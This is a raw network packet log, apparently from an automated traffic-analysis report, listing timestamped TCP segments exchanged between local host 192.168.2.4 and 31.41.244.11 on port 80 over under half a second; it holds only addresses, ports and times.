                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.314140081 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.314171076 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.314187050 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.314361095 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.314397097 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.314431906 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.314433098 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.314454079 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.314498901 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.314923048 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.314958096 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.314979076 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.314992905 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.315007925 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.315042973 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.315551996 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.315587997 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.315603971 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.315623045 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.315642118 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.315656900 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.315664053 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.315705061 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.316199064 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.316234112 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.316243887 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.316273928 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.435941935 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.435971022 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.435983896 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.436023951 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.436067104 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.436304092 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.436319113 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.436345100 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.436382055 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.436459064 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.436660051 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.436770916 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.436805964 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.436856985 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.436867952 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.438771009 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.438807011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.438828945 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.438852072 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.439249039 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.439284086 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.439291000 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.439336061 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.439344883 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.439423084 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.441660881 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.441695929 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.441730022 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.441740990 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.441792011 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.443228006 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.443263054 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.443284988 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.443361044 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.444087029 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.444120884 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.444144011 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.444169044 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.445590973 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.445625067 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.445647001 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.445661068 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.445672035 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.445708036 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.446341991 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.446413040 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.447973013 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.448039055 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.448628902 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.448662996 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.448673964 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.448698997 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.448714972 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.448743105 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.450712919 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.450748920 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.450771093 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.450786114 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.450803995 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.450823069 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.450831890 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.450912952 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.451457977 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.451492071 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.451508999 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.451529980 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.451539040 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.451576948 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.452200890 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.452275038 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.452307940 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.452311993 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.452323914 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.452357054 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.453027964 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.453063011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.453073978 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.453099012 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.453111887 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.453156948 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.453681946 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.453717947 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.453727961 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.453763962 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.494501114 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.494573116 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.494750023 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.494788885 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.494839907 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.495012045 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.495063066 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.495286942 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.495330095 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.495347977 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.495795012 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.495841980 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.495971918 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.496021986 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.496239901 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.496275902 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.496289015 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.496315002 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.496318102 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.496361971 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.497025967 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.497179985 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.497215033 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.497239113 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.497272015 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.497778893 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.497828960 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.497889996 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.497925043 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.497960091 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.497971058 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.497971058 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.498023987 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.498687029 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.498720884 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.498740911 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.498755932 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.498765945 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.498799086 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.499448061 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.499485970 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.499536037 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.499744892 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.499780893 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.499794960 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.499821901 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.500158072 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.500193119 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.500205040 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.500236988 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.501488924 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.501523018 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.501557112 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.501570940 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.501605988 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.502124071 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.502163887 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.502198935 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.502213001 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.502243042 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.502979040 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.503014088 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.503047943 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.503058910 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.503072977 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.503102064 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.503706932 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.503742933 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.503777027 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.503789902 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.503812075 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.503823996 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.503856897 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.504525900 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.504561901 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.504576921 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.504596949 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.504621983 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.504662991 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.505311012 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.505347013 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.505372047 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.505382061 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.505418062 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.505431890 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.506366968 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.506402969 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.506437063 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.506470919 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.506470919 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.506470919 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.506504059 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.506517887 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.507056952 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.507091999 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.507105112 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.507127047 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.507138014 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.507206917 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.507680893 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.507728100 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.507735014 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.507770061 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.507778883 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.507812977 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.508538008 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.508574009 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.508584023 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.508608103 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.508625984 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.508642912 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.508651018 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.508687973 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.509243011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.509278059 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.509289026 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.509315014 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.509320974 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.509372950 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.509968042 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.510003090 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.510036945 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.510056019 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.510071993 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.510093927 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.510122061 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.628287077 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.628423929 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.628460884 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.628499985 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.628536940 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.628865957 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.629844904 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.630911112 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.630945921 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.630954981 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.630980015 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.630985022 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.631015062 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.631030083 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.631061077 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.633233070 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.633269072 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.633305073 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.633318901 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.633368015 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.634047031 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.634125948 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.634459972 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.635468960 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.635503054 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.635551929 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.636183023 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.636218071 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.636228085 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.636260986 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.637778997 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.637829065 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.637829065 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.637865067 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.638456106 CET804974331.41.244.11192.168.2.4
